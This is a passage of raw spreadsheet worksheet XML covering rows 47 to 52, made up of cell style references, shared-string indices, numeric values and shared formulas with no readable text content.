      <c r="CS47" s="86"/>
      <c r="CT47" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU47" s="88" t="s">
        <v>578</v>
      </c>
      <c r="CV47" s="88">
        <v>5.0</v>
      </c>
      <c r="CW47" s="88">
        <v>46.0</v>
      </c>
      <c r="CX47" s="79" t="s">
        <v>579</v>
      </c>
      <c r="CY47" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ47" s="88"/>
      <c r="DA47" s="88"/>
      <c r="DB47" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC47" s="88"/>
      <c r="DD47" s="88"/>
      <c r="DE47" s="88"/>
      <c r="DF47" s="88"/>
      <c r="DG47" s="89"/>
      <c r="DH47" s="89"/>
      <c r="DI47" s="89"/>
      <c r="DJ47" s="89">
        <v>0.0</v>
      </c>
      <c r="DK47" s="89"/>
      <c r="DL47" s="89"/>
      <c r="DM47" s="89"/>
      <c r="DN47" s="89"/>
      <c r="DO47" s="89"/>
      <c r="DP47" s="89"/>
      <c r="DQ47" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR47" s="91"/>
      <c r="DS47" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT47" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU47" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV47" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW47" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX47" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY47" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ47" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA47" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB47" s="74">
        <v>1.0</v>
      </c>
      <c r="EC47" s="74">
        <v>0.0</v>
      </c>
      <c r="ED47" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE47" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="48" ht="153.75" customHeight="1">
      <c r="B48" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C48" s="72" t="s">
        <v>534</v>
      </c>
      <c r="D48" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E48" s="72" t="s">
        <v>535</v>
      </c>
      <c r="F48" s="72" t="s">
        <v>536</v>
      </c>
      <c r="G48" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H48" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I48" s="73" t="s">
        <v>580</v>
      </c>
      <c r="J48" s="73" t="s">
        <v>581</v>
      </c>
      <c r="K48" s="73" t="s">
        <v>582</v>
      </c>
      <c r="L48" s="74">
        <v>2.0</v>
      </c>
      <c r="M48" s="74">
        <v>1.0</v>
      </c>
      <c r="N48" s="74">
        <v>1.0</v>
      </c>
      <c r="O48" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P48" s="74">
        <v>1.0</v>
      </c>
      <c r="Q48" s="74">
        <v>0.0</v>
      </c>
      <c r="R48" s="75" t="s">
        <v>315</v>
      </c>
      <c r="S48" s="76" t="s">
        <v>583</v>
      </c>
      <c r="T48" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U48" s="77" t="s">
        <v>584</v>
      </c>
      <c r="V48" s="76" t="s">
        <v>585</v>
      </c>
      <c r="W48" s="76" t="s">
        <v>12</v>
      </c>
      <c r="X48" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y48" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z48" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA48" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB48" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC48" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD48" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE48" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF48" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG48" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH48" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI48" s="78"/>
      <c r="AJ48" s="78"/>
      <c r="AK48" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL48" s="78"/>
      <c r="AM48" s="78"/>
      <c r="AN48" s="78"/>
      <c r="AO48" s="78"/>
      <c r="AP48" s="80"/>
      <c r="AQ48" s="80"/>
      <c r="AR48" s="80"/>
      <c r="AS48" s="80">
        <v>0.0</v>
      </c>
      <c r="AT48" s="80"/>
      <c r="AU48" s="80"/>
      <c r="AV48" s="80"/>
      <c r="AW48" s="80"/>
      <c r="AX48" s="80"/>
      <c r="AY48" s="80"/>
      <c r="AZ48" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA48" s="82">
        <v>2100366.0</v>
      </c>
      <c r="BB48" s="82">
        <v>1.0</v>
      </c>
      <c r="BC48" s="82">
        <v>30.0</v>
      </c>
      <c r="BD48" s="79">
        <v>2100366.0</v>
      </c>
      <c r="BE48" s="83" t="s">
        <v>12</v>
      </c>
      <c r="BF48" s="83"/>
      <c r="BG48" s="83"/>
      <c r="BH48" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI48" s="83"/>
      <c r="BJ48" s="83"/>
      <c r="BK48" s="83"/>
      <c r="BL48" s="83"/>
      <c r="BM48" s="83"/>
      <c r="BN48" s="83"/>
      <c r="BO48" s="83"/>
      <c r="BP48" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ48" s="83"/>
      <c r="BR48" s="83"/>
      <c r="BS48" s="83"/>
      <c r="BT48" s="83"/>
      <c r="BU48" s="83"/>
      <c r="BV48" s="83"/>
      <c r="BW48" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX48" s="85">
        <v>2100366.0</v>
      </c>
      <c r="BY48" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ48" s="85">
        <v>30.0</v>
      </c>
      <c r="CA48" s="79">
        <v>2100366.0</v>
      </c>
      <c r="CB48" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC48" s="85"/>
      <c r="CD48" s="85"/>
      <c r="CE48" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF48" s="85"/>
      <c r="CG48" s="85"/>
      <c r="CH48" s="85"/>
      <c r="CI48" s="85"/>
      <c r="CJ48" s="86"/>
      <c r="CK48" s="86"/>
      <c r="CL48" s="86"/>
      <c r="CM48" s="86">
        <v>0.0</v>
      </c>
      <c r="CN48" s="86"/>
      <c r="CO48" s="86"/>
      <c r="CP48" s="86"/>
      <c r="CQ48" s="86"/>
      <c r="CR48" s="86"/>
      <c r="CS48" s="86"/>
      <c r="CT48" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU48" s="88" t="s">
        <v>586</v>
      </c>
      <c r="CV48" s="88">
        <v>7.0</v>
      </c>
      <c r="CW48" s="88">
        <v>96.0</v>
      </c>
      <c r="CX48" s="79" t="s">
        <v>587</v>
      </c>
      <c r="CY48" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ48" s="88"/>
      <c r="DA48" s="88"/>
      <c r="DB48" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC48" s="88"/>
      <c r="DD48" s="88"/>
      <c r="DE48" s="88"/>
      <c r="DF48" s="88"/>
      <c r="DG48" s="89"/>
      <c r="DH48" s="89"/>
      <c r="DI48" s="89"/>
      <c r="DJ48" s="89">
        <v>1.0</v>
      </c>
      <c r="DK48" s="89"/>
      <c r="DL48" s="89"/>
      <c r="DM48" s="89"/>
      <c r="DN48" s="89"/>
      <c r="DO48" s="89"/>
      <c r="DP48" s="89"/>
      <c r="DQ48" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR48" s="91"/>
      <c r="DS48" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT48" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU48" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV48" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW48" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX48" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY48" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ48" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA48" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB48" s="74">
        <v>4.0</v>
      </c>
      <c r="EC48" s="74">
        <v>0.0</v>
      </c>
      <c r="ED48" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE48" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="49" ht="153.75" customHeight="1">
      <c r="B49" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C49" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D49" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E49" s="72" t="s">
        <v>588</v>
      </c>
      <c r="F49" s="72" t="s">
        <v>589</v>
      </c>
      <c r="G49" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H49" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I49" s="73" t="s">
        <v>590</v>
      </c>
      <c r="J49" s="73" t="s">
        <v>591</v>
      </c>
      <c r="K49" s="73" t="s">
        <v>592</v>
      </c>
      <c r="L49" s="74"/>
      <c r="M49" s="74">
        <v>1.0</v>
      </c>
      <c r="N49" s="74"/>
      <c r="O49" s="74">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="P49" s="74">
        <v>3.0</v>
      </c>
      <c r="Q49" s="74">
        <v>0.0</v>
      </c>
      <c r="R49" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S49" s="76" t="s">
        <v>593</v>
      </c>
      <c r="T49" s="76" t="s">
        <v>594</v>
      </c>
      <c r="U49" s="77" t="s">
        <v>595</v>
      </c>
      <c r="V49" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W49" s="109"/>
      <c r="X49" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y49" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z49" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA49" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB49" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC49" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD49" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE49" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF49" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG49" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH49" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI49" s="78"/>
      <c r="AJ49" s="78"/>
      <c r="AK49" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL49" s="78"/>
      <c r="AM49" s="78"/>
      <c r="AN49" s="78"/>
      <c r="AO49" s="78"/>
      <c r="AP49" s="80"/>
      <c r="AQ49" s="80"/>
      <c r="AR49" s="80"/>
      <c r="AS49" s="80">
        <v>0.0</v>
      </c>
      <c r="AT49" s="80"/>
      <c r="AU49" s="80"/>
      <c r="AV49" s="80"/>
      <c r="AW49" s="80"/>
      <c r="AX49" s="80"/>
      <c r="AY49" s="80"/>
      <c r="AZ49" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA49" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB49" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC49" s="82"/>
      <c r="BD49" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE49" s="83" t="s">
        <v>12</v>
      </c>
      <c r="BF49" s="83"/>
      <c r="BG49" s="83"/>
      <c r="BH49" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI49" s="83"/>
      <c r="BJ49" s="83"/>
      <c r="BK49" s="83"/>
      <c r="BL49" s="83"/>
      <c r="BM49" s="83"/>
      <c r="BN49" s="83"/>
      <c r="BO49" s="83"/>
      <c r="BP49" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ49" s="83"/>
      <c r="BR49" s="83"/>
      <c r="BS49" s="83"/>
      <c r="BT49" s="83"/>
      <c r="BU49" s="83"/>
      <c r="BV49" s="83"/>
      <c r="BW49" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX49" s="105" t="s">
        <v>596</v>
      </c>
      <c r="BY49" s="85">
        <v>3.0</v>
      </c>
      <c r="BZ49" s="85">
        <v>6.0</v>
      </c>
      <c r="CA49" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB49" s="105" t="s">
        <v>596</v>
      </c>
      <c r="CC49" s="105"/>
      <c r="CD49" s="105"/>
      <c r="CE49" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF49" s="105"/>
      <c r="CG49" s="105"/>
      <c r="CH49" s="105"/>
      <c r="CI49" s="105"/>
      <c r="CJ49" s="106"/>
      <c r="CK49" s="106"/>
      <c r="CL49" s="106"/>
      <c r="CM49" s="86">
        <v>3.0</v>
      </c>
      <c r="CN49" s="86"/>
      <c r="CO49" s="86"/>
      <c r="CP49" s="86"/>
      <c r="CQ49" s="86"/>
      <c r="CR49" s="86"/>
      <c r="CS49" s="86"/>
      <c r="CT49" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU49" s="88" t="s">
        <v>597</v>
      </c>
      <c r="CV49" s="88">
        <v>5.0</v>
      </c>
      <c r="CW49" s="88"/>
      <c r="CX49" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY49" s="104" t="s">
        <v>596</v>
      </c>
      <c r="CZ49" s="104"/>
      <c r="DA49" s="104"/>
      <c r="DB49" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC49" s="104"/>
      <c r="DD49" s="104"/>
      <c r="DE49" s="104"/>
      <c r="DF49" s="104"/>
      <c r="DG49" s="89"/>
      <c r="DH49" s="89"/>
      <c r="DI49" s="89"/>
      <c r="DJ49" s="89">
        <v>3.0</v>
      </c>
      <c r="DK49" s="89"/>
      <c r="DL49" s="89"/>
      <c r="DM49" s="89"/>
      <c r="DN49" s="89"/>
      <c r="DO49" s="89"/>
      <c r="DP49" s="89"/>
      <c r="DQ49" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR49" s="91" t="s">
        <v>598</v>
      </c>
      <c r="DS49" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT49" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU49" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV49" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW49" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX49" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY49" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ49" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA49" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB49" s="74"/>
      <c r="EC49" s="74">
        <v>0.0</v>
      </c>
      <c r="ED49" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE49" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="50" ht="153.75" customHeight="1">
      <c r="B50" s="71" t="s">
        <v>450</v>
      </c>
      <c r="C50" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D50" s="72" t="s">
        <v>451</v>
      </c>
      <c r="E50" s="72" t="s">
        <v>588</v>
      </c>
      <c r="F50" s="72" t="s">
        <v>589</v>
      </c>
      <c r="G50" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H50" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I50" s="73" t="s">
        <v>590</v>
      </c>
      <c r="J50" s="73" t="s">
        <v>591</v>
      </c>
      <c r="K50" s="73" t="s">
        <v>599</v>
      </c>
      <c r="L50" s="74"/>
      <c r="M50" s="74">
        <v>1.0</v>
      </c>
      <c r="N50" s="74"/>
      <c r="O50" s="74">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="P50" s="74">
        <v>3.0</v>
      </c>
      <c r="Q50" s="74">
        <v>0.0</v>
      </c>
      <c r="R50" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S50" s="76" t="s">
        <v>593</v>
      </c>
      <c r="T50" s="76" t="s">
        <v>594</v>
      </c>
      <c r="U50" s="77" t="s">
        <v>595</v>
      </c>
      <c r="V50" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W50" s="109"/>
      <c r="X50" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y50" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z50" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA50" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB50" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC50" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD50" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE50" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF50" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG50" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH50" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI50" s="78"/>
      <c r="AJ50" s="78"/>
      <c r="AK50" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL50" s="78"/>
      <c r="AM50" s="78"/>
      <c r="AN50" s="78"/>
      <c r="AO50" s="78"/>
      <c r="AP50" s="80"/>
      <c r="AQ50" s="80"/>
      <c r="AR50" s="80"/>
      <c r="AS50" s="80">
        <v>0.0</v>
      </c>
      <c r="AT50" s="80"/>
      <c r="AU50" s="80"/>
      <c r="AV50" s="80"/>
      <c r="AW50" s="80"/>
      <c r="AX50" s="80"/>
      <c r="AY50" s="80"/>
      <c r="AZ50" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA50" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB50" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC50" s="82"/>
      <c r="BD50" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE50" s="83" t="s">
        <v>12</v>
      </c>
      <c r="BF50" s="83"/>
      <c r="BG50" s="83"/>
      <c r="BH50" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI50" s="83"/>
      <c r="BJ50" s="83"/>
      <c r="BK50" s="83"/>
      <c r="BL50" s="83"/>
      <c r="BM50" s="83"/>
      <c r="BN50" s="83"/>
      <c r="BO50" s="83"/>
      <c r="BP50" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ50" s="83"/>
      <c r="BR50" s="83"/>
      <c r="BS50" s="83"/>
      <c r="BT50" s="83"/>
      <c r="BU50" s="83"/>
      <c r="BV50" s="83"/>
      <c r="BW50" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX50" s="105" t="s">
        <v>596</v>
      </c>
      <c r="BY50" s="85">
        <v>3.0</v>
      </c>
      <c r="BZ50" s="85">
        <v>6.0</v>
      </c>
      <c r="CA50" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB50" s="105" t="s">
        <v>596</v>
      </c>
      <c r="CC50" s="105"/>
      <c r="CD50" s="105"/>
      <c r="CE50" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF50" s="105"/>
      <c r="CG50" s="105"/>
      <c r="CH50" s="105"/>
      <c r="CI50" s="105"/>
      <c r="CJ50" s="106"/>
      <c r="CK50" s="106"/>
      <c r="CL50" s="106"/>
      <c r="CM50" s="86">
        <v>3.0</v>
      </c>
      <c r="CN50" s="86"/>
      <c r="CO50" s="86"/>
      <c r="CP50" s="86"/>
      <c r="CQ50" s="86"/>
      <c r="CR50" s="86"/>
      <c r="CS50" s="86"/>
      <c r="CT50" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU50" s="88" t="s">
        <v>600</v>
      </c>
      <c r="CV50" s="88">
        <v>5.0</v>
      </c>
      <c r="CW50" s="88"/>
      <c r="CX50" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY50" s="104" t="s">
        <v>596</v>
      </c>
      <c r="CZ50" s="104"/>
      <c r="DA50" s="104"/>
      <c r="DB50" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC50" s="104"/>
      <c r="DD50" s="104"/>
      <c r="DE50" s="104"/>
      <c r="DF50" s="104"/>
      <c r="DG50" s="89"/>
      <c r="DH50" s="89"/>
      <c r="DI50" s="89"/>
      <c r="DJ50" s="89">
        <v>3.0</v>
      </c>
      <c r="DK50" s="89"/>
      <c r="DL50" s="89"/>
      <c r="DM50" s="89"/>
      <c r="DN50" s="89"/>
      <c r="DO50" s="89"/>
      <c r="DP50" s="89"/>
      <c r="DQ50" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR50" s="91" t="s">
        <v>598</v>
      </c>
      <c r="DS50" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT50" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU50" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV50" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW50" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX50" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY50" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ50" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA50" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB50" s="74"/>
      <c r="EC50" s="74">
        <v>0.0</v>
      </c>
      <c r="ED50" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE50" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="51" ht="153.75" customHeight="1">
      <c r="B51" s="117" t="s">
        <v>450</v>
      </c>
      <c r="C51" s="118" t="s">
        <v>12</v>
      </c>
      <c r="D51" s="118" t="s">
        <v>451</v>
      </c>
      <c r="E51" s="118" t="s">
        <v>601</v>
      </c>
      <c r="F51" s="118" t="s">
        <v>602</v>
      </c>
      <c r="G51" s="119" t="s">
        <v>603</v>
      </c>
      <c r="H51" s="118" t="s">
        <v>604</v>
      </c>
      <c r="I51" s="120" t="s">
        <v>605</v>
      </c>
      <c r="J51" s="120" t="s">
        <v>606</v>
      </c>
      <c r="K51" s="120" t="s">
        <v>607</v>
      </c>
      <c r="L51" s="74">
        <v>3.0</v>
      </c>
      <c r="M51" s="74">
        <v>1.0</v>
      </c>
      <c r="N51" s="74">
        <v>1.0</v>
      </c>
      <c r="O51" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P51" s="121">
        <v>1.0</v>
      </c>
      <c r="Q51" s="121">
        <v>0.0</v>
      </c>
      <c r="R51" s="99" t="s">
        <v>106</v>
      </c>
      <c r="S51" s="122" t="s">
        <v>608</v>
      </c>
      <c r="T51" s="122" t="s">
        <v>12</v>
      </c>
      <c r="U51" s="123" t="s">
        <v>609</v>
      </c>
      <c r="V51" s="122" t="s">
        <v>610</v>
      </c>
      <c r="W51" s="122" t="s">
        <v>611</v>
      </c>
      <c r="X51" s="99" t="s">
        <v>13</v>
      </c>
      <c r="Y51" s="99" t="s">
        <v>106</v>
      </c>
      <c r="Z51" s="99" t="s">
        <v>112</v>
      </c>
      <c r="AA51" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB51" s="99" t="s">
        <v>112</v>
      </c>
      <c r="AC51" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AD51" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AE51" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AF51" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AG51" s="125" t="s">
        <v>12</v>
      </c>
      <c r="AH51" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AI51" s="124"/>
      <c r="AJ51" s="124"/>
      <c r="AK51" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL51" s="124"/>
      <c r="AM51" s="124"/>
      <c r="AN51" s="124"/>
      <c r="AO51" s="124"/>
      <c r="AP51" s="126"/>
      <c r="AQ51" s="126"/>
      <c r="AR51" s="126"/>
      <c r="AS51" s="126">
        <v>0.0</v>
      </c>
      <c r="AT51" s="126"/>
      <c r="AU51" s="126"/>
      <c r="AV51" s="126"/>
      <c r="AW51" s="126"/>
      <c r="AX51" s="126"/>
      <c r="AY51" s="126"/>
      <c r="AZ51" s="127">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA51" s="128" t="s">
        <v>12</v>
      </c>
      <c r="BB51" s="128" t="s">
        <v>12</v>
      </c>
      <c r="BC51" s="128" t="s">
        <v>12</v>
      </c>
      <c r="BD51" s="125" t="s">
        <v>12</v>
      </c>
      <c r="BE51" s="129" t="s">
        <v>12</v>
      </c>
      <c r="BF51" s="129"/>
      <c r="BG51" s="129"/>
      <c r="BH51" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI51" s="129"/>
      <c r="BJ51" s="129"/>
      <c r="BK51" s="129"/>
      <c r="BL51" s="129"/>
      <c r="BM51" s="129"/>
      <c r="BN51" s="129"/>
      <c r="BO51" s="129"/>
      <c r="BP51" s="129">
        <v>0.0</v>
      </c>
      <c r="BQ51" s="129"/>
      <c r="BR51" s="129"/>
      <c r="BS51" s="129"/>
      <c r="BT51" s="129"/>
      <c r="BU51" s="129"/>
      <c r="BV51" s="129"/>
      <c r="BW51" s="130">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX51" s="131" t="s">
        <v>12</v>
      </c>
      <c r="BY51" s="131" t="s">
        <v>12</v>
      </c>
      <c r="BZ51" s="131" t="s">
        <v>12</v>
      </c>
      <c r="CA51" s="125" t="s">
        <v>12</v>
      </c>
      <c r="CB51" s="131" t="s">
        <v>12</v>
      </c>
      <c r="CC51" s="131"/>
      <c r="CD51" s="131"/>
      <c r="CE51" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF51" s="131"/>
      <c r="CG51" s="131"/>
      <c r="CH51" s="131"/>
      <c r="CI51" s="131"/>
      <c r="CJ51" s="132"/>
      <c r="CK51" s="132"/>
      <c r="CL51" s="132"/>
      <c r="CM51" s="132">
        <v>0.0</v>
      </c>
      <c r="CN51" s="132"/>
      <c r="CO51" s="132"/>
      <c r="CP51" s="132"/>
      <c r="CQ51" s="132"/>
      <c r="CR51" s="132"/>
      <c r="CS51" s="132"/>
      <c r="CT51" s="133">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU51" s="134" t="s">
        <v>149</v>
      </c>
      <c r="CV51" s="134">
        <v>2.0</v>
      </c>
      <c r="CW51" s="134">
        <v>2.0</v>
      </c>
      <c r="CX51" s="125" t="s">
        <v>149</v>
      </c>
      <c r="CY51" s="134" t="s">
        <v>12</v>
      </c>
      <c r="CZ51" s="134"/>
      <c r="DA51" s="134"/>
      <c r="DB51" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC51" s="134"/>
      <c r="DD51" s="134"/>
      <c r="DE51" s="134"/>
      <c r="DF51" s="134"/>
      <c r="DG51" s="135"/>
      <c r="DH51" s="135"/>
      <c r="DI51" s="135"/>
      <c r="DJ51" s="135">
        <v>0.0</v>
      </c>
      <c r="DK51" s="135"/>
      <c r="DL51" s="135"/>
      <c r="DM51" s="135"/>
      <c r="DN51" s="135"/>
      <c r="DO51" s="135"/>
      <c r="DP51" s="135"/>
      <c r="DQ51" s="136">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR51" s="137"/>
      <c r="DS51" s="138" t="s">
        <v>12</v>
      </c>
      <c r="DT51" s="138" t="s">
        <v>12</v>
      </c>
      <c r="DU51" s="138" t="s">
        <v>12</v>
      </c>
      <c r="DV51" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DW51" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DX51" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DY51" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DZ51" s="139" t="s">
        <v>12</v>
      </c>
      <c r="EA51" s="139" t="s">
        <v>12</v>
      </c>
      <c r="EB51" s="121">
        <v>3.0</v>
      </c>
      <c r="EC51" s="121">
        <v>0.0</v>
      </c>
      <c r="ED51" s="140">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE51" s="141" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="52" ht="153.75" customHeight="1">
      <c r="B52" s="142" t="s">
        <v>534</v>
      </c>
      <c r="C52" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D52" s="143" t="s">
        <v>612</v>
      </c>
      <c r="E52" s="143" t="s">
        <v>613</v>
      </c>
      <c r="F52" s="143" t="s">
        <v>614</v>
      </c>
      <c r="G52" s="144" t="s">
        <v>615</v>
      </c>
      <c r="H52" s="143" t="s">
        <v>616</v>
      </c>
      <c r="I52" s="145" t="s">
        <v>617</v>
      </c>
      <c r="J52" s="145" t="s">
        <v>441</v>
      </c>
      <c r="K52" s="145" t="s">
        <v>618</v>
      </c>
      <c r="L52" s="74">
        <v>1.0</v>
      </c>
      <c r="M52" s="74">
        <v>1.0</v>
      </c>
      <c r="N52" s="74">
        <v>1.0</v>
      </c>
      <c r="O52" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
